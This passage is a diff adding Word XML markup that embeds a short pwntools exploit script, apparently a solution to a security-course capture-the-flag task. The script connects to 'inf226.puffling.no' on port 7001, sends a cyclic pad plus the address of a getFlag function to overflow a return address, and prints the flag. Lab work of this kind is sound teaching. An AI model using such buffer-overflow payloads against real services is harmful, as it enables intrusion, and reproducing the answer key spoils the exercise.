+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>remote</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'inf226.puffling.no'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>7001</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t># 00000000004011d6 &lt;getFlag&gt; from objdump -d ./01</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cyclic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>4011d6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>().</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>decode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>splitlines</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Flag 01: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
